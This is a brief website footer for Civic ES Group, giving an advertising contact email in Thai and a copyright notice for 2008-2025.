ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2025 Civic ES Group. All rights reserved.